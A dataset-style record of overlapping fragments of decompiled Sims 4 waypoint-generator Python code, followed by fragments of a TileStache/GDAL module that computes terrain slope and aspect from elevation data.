the generator to start at (will choose", "the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. Set to", "routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ =", "based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit.", "get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _", "cur_waypoint is None: logger.warn('No connection chosen from waypoint graph for waypoint id {}.',", "Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name:", "**kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver)", "end at (will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum", "logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and", "to start at (will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint", "0 while num_visited < self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None)", "cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from waypoint graph", "# Size of source mod 2**32: 3643 bytes import sims4 from event_testing.resolver import", "the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to", "connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is", "version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7,", "TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking')", "'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will choose one based on", "= self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined in waypoint graph", "3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded", "waypoint id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if cur_waypoint ==", "3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet", "default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n", "reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim", "prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection chosen", "def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint,", "_WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES =", "get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is", "0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined in", "id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint =", "waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start", "tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. Set to 0", "is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None", "at: 2020-04-22 01:40:18 # Size of source mod 2**32: 3643 bytes import sims4", "None: logger.warn('No connections defined in waypoint graph for waypoint id {}.', cur_waypoint) break", "break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint =", "tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim", "0 to keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)}", "going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args,", "the generator to end at (will choose one based on the tests/weights).\\n '),", "for waypoint id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if cur_waypoint", "self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined in waypoint graph for", "# Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17", "if connections is None: logger.warn('No connections defined in waypoint graph for waypoint id", "v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22", "Waypoint for the generator to start at (will choose one based on the", "defined in waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint =", "cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint", "'), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at (will choose one based", "is None: logger.warn('No connections defined in waypoint graph for waypoint id {}.', cur_waypoint)", "minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver =", "connection chosen from waypoint graph for waypoint id {}.', prev_waypoint) break num_visited +=", "= self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint =", "based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at", "connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined in waypoint", "mod 2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import", "visit. Set to 0 to keep going until ending_waypoint is reached.\\n ', tunable_type=int,", "self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None", "import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger =", "= {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for", "_ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint", "waypoint graph for waypoint id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint", "in waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph,", "(super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface,", "def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint,", "17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py", "number of waypoints to visit. Set to 0 to keep going until ending_waypoint", "64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18", "'), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. Set to 0 to", "Waypoint for the generator to end at (will choose one based on the", "'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at (will choose one based on", "num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints == 0: connections =", "or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No", "from waypoint graph for waypoint id {}.', prev_waypoint) break num_visited += 1 yield", "= 0 while num_visited < self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint,", "self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited", "= None num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints == 0:", "2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py #", "num_visited < self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections", "T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of source mod 2**32: 3643", "from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange", "self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections", "SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self,", "resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No", "waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint", "to keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def", "to 0 to keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0,", "def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint", "__init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint", "# uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python", "= self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited < self.max_waypoints or", "Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator", "maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim)", "ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0 while", "until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs):", "= sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections", "keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self,", "them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at (will choose one", "= SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def", "self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None:", "== 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined", "logger.warn('No connection chosen from waypoint graph for waypoint id {}.', prev_waypoint) break num_visited", "Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of source", "= cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from", "start at (will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for", "generator to start at (will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n", "is None: logger.warn('No connection chosen from waypoint graph for waypoint id {}.', prev_waypoint)", "(AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size", "The maximum number of waypoints to visit. Set to 0 to keep going", "default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver", "resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface,", "not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint", "else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0", "', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim =", "= self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver", "self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent,", "Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] #", "{'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the", "SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else:", "Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020,", "self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return", "18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled", "2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet,", "self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints", "of source mod 2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from", "< self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is", "and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at", "is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs)", "if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint", "class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '),", "'), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will choose one based", "None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint =", "choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints", "resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if", "the generator to start at (will choose one based on the tests/weights).\\n '),", "routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase):", "generator to end at (will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n", "TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints", "None num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints == 0: connections", "(will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of", "self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count):", "3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug", "on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. Set", "Size of source mod 2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver", "connections defined in waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint", "self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None:", "resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint", "graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver,", "None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited <", "the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will choose", "logger.warn('No connections defined in waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint,", "Compiled at: 2020-04-22 01:40:18 # Size of source mod 2**32: 3643 bytes import", "event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from", "FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint", "from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class", "= self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self):", "graph for waypoint id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if", "sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import", "for the generator to end at (will choose one based on the tests/weights).\\n", "<gh_stars>0 # uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from:", "tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will choose one", "{}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint", "from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase", "(tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file", "prev_waypoint = None num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints ==", "self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None:", "routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger", "bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 #", "= SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver)", "None) if connections is None: logger.warn('No connections defined in waypoint graph for waypoint", "bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18)", "new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from waypoint graph for waypoint", "waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface,", "= None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited", "file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of source mod", "bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from", "source mod 2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph" ]
[]
[ "0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair", "__init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source =", "xres); y = ((window[6] + window[7] + window[7] + window[8]) \\ - (window[0]", "SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core", "resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # #", "slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi", "(row, col) in product(range(3), range(3))] x = ((window[0] + window[3] + window[3] +", "in radians, from 0 for sheer face to pi/2 for flat ground. Aspect", "top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference =", "float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height,", "\"\"\" Return an instance of SlopeAndAspect for requested area. \"\"\" assert srs ==", "'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin,", "osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by one pixel on all", "returned in radians, counterclockwise from -pi at north around to pi. Logic here", "def crop(self, box): \"\"\" Returns a rectangular region from the current image. Box", "proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle,", "1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if _func is None:", "for later alpha-blending. # do_blending = bool(proportion_complete > 0 and proportion < 1)", "Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self): return '.' class", "for generating tiles of DEM slope and aspect data. Source parameter can be", "(maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if", "knows only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on", "current image. Box is a 4-tuple with left, upper, right, and lower pixels.", "= osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by one pixel on", "!= 'TIFF': raise Exception('File format other than TIFF for slope and aspect: \"%s\"'", "assert sum([proportion for (mod, proportion) in providers]) == 1.0 # # Prepare information", "\"\"\" from math import pi, sin, cos from os import unlink, close from", "window[6]) \\ - (window[2] + window[5] + window[5] + window[8])) \\ / (8.0", "geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect = aspect self.w,", "\"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z", "SRTM1, NED10m # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom", "(8.0 * yres); # in radians, from 0 to pi/2 slope = pi/2", "name(self): return '.' class Provider: \"\"\" TileStache provider for generating tiles of DEM", "os import unlink, close from itertools import product from tempfile import mkstemp from", "tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self, ext): if ext.lower() !=", "to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise,", "((window[6] + window[7] + window[7] + window[8]) \\ - (window[0] + window[1] +", "on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname)", "source DEM and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels =", "for requested area. \"\"\" assert srs == webmerc_proj.srs # <-- good enough for", "# cubic looks better squeezing down resample = gdal.GRA_Cubic else: # cubic spline", "providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) == 1.0 #", "save_slope_aspect # used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter =", "# do_blending = bool(proportion_complete > 0 and proportion < 1) if do_blending: composite_without", "proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save", "cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size)", "SRTM1 or SRTM3, and the proportions must all add up to one. Return", "= (xmax - xmin) / width yres = (ymin - ymax) / height", "pi aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external", "yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data", "module such as SRTM1 or SRTM3, and the proportions must all add up", "in module.datasources(*ds_args): # estimate the raster density across source DEM and output dem_samples", "self.source = source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return", "yres); # in radians, from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x", "data. Intended for use in hillup-seed.py script for preparing a tile directory. \"\"\"", "\"\"\" TileStache response object with PIL-like save() and crop() methods. This object knows", "NED100m bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)]", "< zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top", "in radians, from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y))", "elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top", "for given zoom level. Each data source is a module such as SRTM1", "object interacts with TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir =", "- xres, xres, 0, ymax - yres, 0, yres # # Reproject and", "* proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds", "better squeezing down resample = gdal.GRA_Cubic else: # cubic spline looks better stretching", "must all add up to one. Return list has either one or two", "has either one or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km,", "yres, z=1.0): \"\"\" Return a pair of arrays 2 pixels smaller than the", "elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save slope", "Prepare information for datasets of the desired extent and projection. # xres =", "for given zoom level. Each data source is a module such as NED10m", "a module such as NED10m or NED1km, and the proportions must all add", "from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration", "webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding", "object interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\"", "slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def", "for datasets of the desired extent and projection. # xres = (xmax -", "for (row, col) in product(range(3), range(3))] x = ((window[0] + window[3] + window[3]", "# # Reproject and merge DEM datasources into destination datasets. 